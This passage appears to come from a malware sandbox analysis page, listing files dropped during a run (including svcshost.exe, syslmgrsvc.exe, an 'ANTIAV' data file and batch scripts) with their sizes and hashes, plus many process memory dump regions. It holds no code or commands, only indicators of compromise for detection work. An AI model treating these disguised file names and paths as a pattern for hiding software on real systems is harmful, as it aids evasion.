SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd
Filesize
222B

MD5
68cecdf24aa2fd011ece466f00ef8450

SHA1
2f859046187e0d5286d0566fac590b1836f6e1b7

SHA256
64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770

SHA512
471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
Filesize
2.2MB

MD5
7fc02b51dd8ee71d01cf01ec2faa8cc6

SHA1
52d16d36ea5719177ac56d1420281587b84268e5

SHA256
87920f35f5b119fa851cc3e1be8d26669a86636d25fb5a1fc71d8e49c20426b1

SHA512
f7c98a71882f8517b9c942222de7f5ef8b75a3b5699530f194ff1c670c1e4c4ab1622d2dbf5e9145df28d67491a96fd5c2e6b2ebf8aa9fa07415e4e7466bde5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
Filesize
9KB

MD5
ed96024f86a8d005a58c85056c939b57

SHA1
304349dddbc2be0b786188aeb9f3e774b3eee000

SHA256
191472c620709b27aaf22d77531ad320de820f4470911d12ca947835b11985a3

SHA512
d8b40cd1a478daeb50aaf641b5dca98f483b7164f06a0c7bc9ff73f3ae75197542518b1fa867622600f3b589756e493bba6baa88c98a284751f2a4abd710e07d

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
Filesize
1.6MB

MD5
1dea9b52d271181663e8490fb0cfb259

SHA1
ecb5431dd5f2195fa006f6b122fbada1ee7814fa

SHA256
4d06d0ef87f79d86c05b505d6bb1726e76e032514de129b1421d660fd31b7934

SHA512
fff4c592f7947f29fc3c1209f13d9c2b19a052e88cab59e1f18f0d30eb53b734601d8292dbfb2004d6ab13b72f36d3ef600808c83625aa32f5a152af6acc1812

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\svcshost.exe
Filesize
21KB

MD5
3157f43bcc6254d4dd2b18ed3748cc0e

SHA1
e9268a22049763ada485c7ab61538767f1e5693e

SHA256
8abd4b8b64f0594bd1295a458d5f157fe6d3af3000318025273645c753ec18aa

SHA512
0ea5d6a6e12bc7fea0f1129aed97eb15801d9003033d96758810598bee9d8dc1a49626e655527cb7c758856e2c471e4801460abffdaeb2d8c4b7faebdb91d74e

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin
Filesize
1.6MB

MD5
6f4dc951bbb91da352f1b1736b9551dc

SHA1
c94c3fbb3a830f8a3f98963eef485ecbf7f8487b

SHA256
ffeeaa61d3e4e3aeedbd1303757049b46e30bad6445e6d78f02efce265071404

SHA512
da41d47ce5f4599bb7acbf71cfd22980f2f0f2cd74aecf1dc9664f349815a44389f13c0c2c70a89812ab665fb4b932f64f0a48664d63206e22db655f223406ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat
Filesize
468B

MD5
1005b0d4f17c3e5c9a8c0e89f3943c63

SHA1
5d5e9a7ad0c21cb256f7381cb1fd414aff83d102

SHA256
db61ff7a98d6279ae8db81c9713407f42f673da134d2b12d31d0bae0a3eb00e7

SHA512
845c09bded690af0563c6f94357d591425604b4d34404c46caba5295c192dd7eb66b620d2656b4de6a26f90657e08f591b9b46bb3d821d5344329727f37d5540

Download Submit
C:\Windows\Temp\aad9f05a9a826b65ff2b94740ca196c2
Filesize
35KB

MD5
38ddcc3df5a2a4e0ba797782b33fc5a1

SHA1
8a3387232b7501a623d4ba5a0b21f3ff88696647

SHA256
8d0c6c3d7235d59d403a8f02f234a7bca155c928addebfdb4fffac51d90503f3

SHA512
79b50ce781bd1a22e3b47eaa9a1dd1796974421c7741a1ebb7e6bc2818a53e2f74302fde89e89ee452476999a95542efffa7f2cddef7e392b9a67eaf370d9fbc

Download Submit
C:\Windows\syslmgrsvc.exe
Filesize
93KB

MD5
a318cc45e79498b93e40d5e5b9b76be4

SHA1
4ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5

SHA256
4b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2

SHA512
3131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c

Download Submit
C:\Windows\winqlsdrvcs.exe
Filesize
14KB

MD5
686899bd841d603551a0429d09cb906c

SHA1
c827bc460766c0c39fa9ad27918fb0f409379eb3

SHA256
483142a79ce1fce6474da5dcfeea48104eda46a960c7eb9b9581d555dd6cfc77

SHA512
850919af70b4b0548fc985b49fa35f5613c31bde6fb46b19753b181c25e0251c52b121a26459c230a969e8ae23fb1dccd547be6a34d2a73dfe4e0d31e6874b76

Download Submit
C:\kkxqbh.bat
Filesize
77B

MD5
13877fe8fb3b5604693f098ce86d1711

SHA1
9bc95df3c0a12eaabc1e00460d7d0aae8c15f35f

SHA256
f2db62c42b700748f5b2f035dbe8f870cc6cab0c8d1c8721cbe18fa6438ac105

SHA512
049d6d0abecd59adebd20250316836b53cd15b7351eec0d1ed20b52e39ae9fa0bdfb23c5c141c89bf633ac402cf1f443c3f3d6faf97173eda4fecd4a79fd5443

Download Submit
memory/1168-16066-0x0000025A9EB70000-0x0000025A9EB92000-memory.dmp

Filesize
136KB

Download
memory/1388-1-0x00000000005F0000-0x00000000005F8000-memory.dmp

Filesize
32KB

Download
memory/1388-0-0x00007FFFFC710000-0x00007FFFFC732000-memory.dmp

Filesize
136KB

Download
memory/1680-16153-0x000000001C2A0000-0x000000001C352000-memory.dmp

Filesize
712KB

Download
memory/1680-16151-0x000000001C190000-0x000000001C1E0000-memory.dmp

Filesize
320KB

Download
memory/3272-15681-0x0000000000DC0000-0x0000000000DCC000-memory.dmp

Filesize
48KB

Download
memory/3456-15310-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/3456-11865-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/4304-104-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-74-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-84-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-78-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-72-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-101-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-102-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-94-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-96-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-76-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-62-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-82-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-44-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-50-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-46-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-90-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-68-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-41-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-42-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-48-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-52-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-54-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-56-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-92-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-86-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-6384-0x0000000004BE0000-0x0000000004C46000-memory.dmp

Filesize
408KB

Download
memory/4304-88-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-39-0x0000000000210000-0x0000000000284000-memory.dmp

Filesize
464KB

Download
memory/4304-58-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-60-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-64-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-66-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-40-0x0000000004A50000-0x0000000004B2C000-memory.dmp

Filesize
880KB

Download
memory/4304-71-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-80-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4304-98-0x0000000004A50000-0x0000000004B27000-memory.dmp

Filesize
860KB

Download
memory/4392-6388-0x0000000000010000-0x0000000000028000-memory.dmp

Filesize
96KB

Download
memory/4436-6395-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/4436-3663-0x0000000005400000-0x0000000005410000-memory.dmp

Filesize
64KB

Download
memory/4436-15-0x00000000052D0000-0x000000000536C000-memory.dmp

Filesize
624KB

Download
memory/4436-14-0x0000000000480000-0x00000000008DA000-memory.dmp

Filesize
4.4MB

Download
memory/4436-13-0x000000007454E000-0x000000007454F000-memory.dmp

Filesize
4KB

Download
memory/4436-2847-0x0000000006920000-0x0000000006AB2000-memory.dmp

Filesize
1.6MB

Download
memory/4436-2400-0x0000000006680000-0x000000000691A000-memory.dmp

Filesize
2.6MB

Download
memory/4436-2064-0x0000000074540000-0x0000000074CF0000-memory.dmp

Filesize
7.7MB

Download
memory/5500-11233-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/5504-16150-0x0000000140000000-0x0000000140004248-memory.dmp

Filesize
16KB

Download
memory/5504-16188-0x0000000140000000-0x0000000140004248-memory.dmp

Filesize
16KB

Download
memory/5560-15717-0x00000000055E0000-0x0000000005646000-memory.dmp

Filesize
408KB

Download
memory/5560-15770-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/5560-15716-0x0000000004EC0000-0x0000000004EE2000-memory.dmp

Filesize
136KB

Download
memory/5560-15712-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/5560-15727-0x00000000057C0000-0x0000000005B14000-memory.dmp

Filesize
3.3MB

Download
memory/5560-15728-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

Filesize
120KB

Download
memory/5560-15729-0x0000000006340000-0x000000000638C000-memory.dmp

Filesize
304KB

Download
memory/5560-15708-0x0000000004800000-0x0000000004836000-memory.dmp

Filesize
216KB

Download
memory/5560-15815-0x0000000007340000-0x0000000007348000-memory.dmp

Filesize
32KB

Download
memory/5560-15759-0x0000000006F90000-0x0000000006FC2000-memory.dmp

Filesize
200KB

Download
memory/5560-15760-0x0000000063450000-0x000000006349C000-memory.dmp

Filesize
304KB

Download
memory/5560-15809-0x00000000073F0000-0x000000000740A000-memory.dmp

Filesize
104KB

Download
memory/5560-15771-0x0000000006FD0000-0x0000000007073000-memory.dmp

Filesize
652KB

Download
memory/5560-15781-0x0000000007760000-0x0000000007DDA000-memory.dmp

Filesize
6.5MB

Download
memory/5560-15782-0x00000000070B0000-0x00000000070CA000-memory.dmp

Filesize
104KB

Download
memory/5560-15784-0x0000000007130000-0x000000000713A000-memory.dmp

Filesize
40KB

Download
memory/5560-15787-0x0000000007350000-0x00000000073E6000-memory.dmp

Filesize
600KB

Download
memory/5560-15788-0x00000000072C0000-0x00000000072D1000-memory.dmp

Filesize
68KB

Download
memory/5560-15806-0x0000000007310000-0x0000000007324000-memory.dmp

Filesize
80KB

Download
memory/5560-15804-0x0000000007300000-0x000000000730E000-memory.dmp

Filesize
56KB

Download
memory/6100-5936-0x0000000000420000-0x0000000000430000-memory.dmp

Filesize
64KB

Download
memory/6476-6464-0x0000000000020000-0x0000000000094000-memory.dmp

Filesize
464KB

Download
memory/6476-6465-0x00000000047A0000-0x000000000487C000-memory.dmp

Filesize
880KB

Download
memory/6488-16111-0x000002106B800000-0x000002106B808000-memory.dmp

Filesize
32KB

Download
memory/6488-16110-0x000002106B850000-0x000002106B86A000-memory.dmp

Filesize
104KB

Download
memory/6488-16113-0x000002106B840000-0x000002106B84A000-memory.dmp

Filesize
40KB

Download
memory/6488-16112-0x000002106B830000-0x000002106B836000-memory.dmp

Filesize
24KB

Download
memory/6488-16109-0x000002106B7F0000-0x000002106B7FA000-memory.dmp

Filesize
40KB

Download
memory/6488-16102-0x000002106B810000-0x000002106B82C000-memory.dmp

Filesize
112KB

Download
memory/6488-16101-0x000002106B6A0000-0x000002106B6AA000-memory.dmp

Filesize
40KB

Download
memory/6488-16099-0x000002106B5C0000-0x000002106B5DC000-memory.dmp

Filesize
112KB

Download
memory/6488-16100-0x000002106B5E0000-0x000002106B695000-memory.dmp

Filesize
724KB

Download
memory/6520-6405-0x0000000008130000-0x000000000817C000-memory.dmp

Filesize
304KB

Download
memory/6520-5869-0x0000000004D90000-0x0000000004E22000-memory.dmp

Filesize
584KB

Download
memory/6520-6414-0x0000000009A70000-0x0000000009C32000-memory.dmp

Filesize
1.8MB

Download
memory/6520-6401-0x0000000007F60000-0x0000000007F72000-memory.dmp

Filesize
72KB

Download
memory/6520-5868-0x00000000052A0000-0x0000000005844000-memory.dmp

Filesize
5.6MB

Download
memory/6520-6411-0x0000000008C50000-0x0000000008CC6000-memory.dmp

Filesize
472KB

Download
memory/6520-6399-0x00000000084B0000-0x0000000008AC8000-memory.dmp

Filesize
6.1MB

Download
memory/6520-6091-0x0000000004F50000-0x0000000004F5A000-memory.dmp

Filesize
40KB

Download
memory/6520-6412-0x0000000008490000-0x00000000084AE000-memory.dmp

Filesize
120KB

Download
memory/6520-6415-0x000000000A170000-0x000000000A69C000-memory.dmp

Filesize
5.2MB

Download
memory/6520-6400-0x0000000008020000-0x000000000812A000-memory.dmp

Filesize
1.0MB

Download
memory/6520-6402-0x0000000007FC0000-0x0000000007FFC000-memory.dmp

Filesize
240KB

Download
memory/6520-5867-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/6928-15302-0x00000000051C0000-0x000000000520C000-memory.dmp

Filesize
304KB

Download
memory/6928-15301-0x0000000005120000-0x00000000051BE000-memory.dmp

Filesize
632KB

Download
memory/6928-12991-0x00000000027C0000-0x00000000028D6000-memory.dmp

Filesize
1.1MB

Download
memory/6928-12990-0x0000000000620000-0x00000000006F8000-memory.dmp

Filesize
864KB

Download
memory/8168-16123-0x0000000000DF0000-0x0000000001114000-memory.dmp

Filesize
3.1MB

Download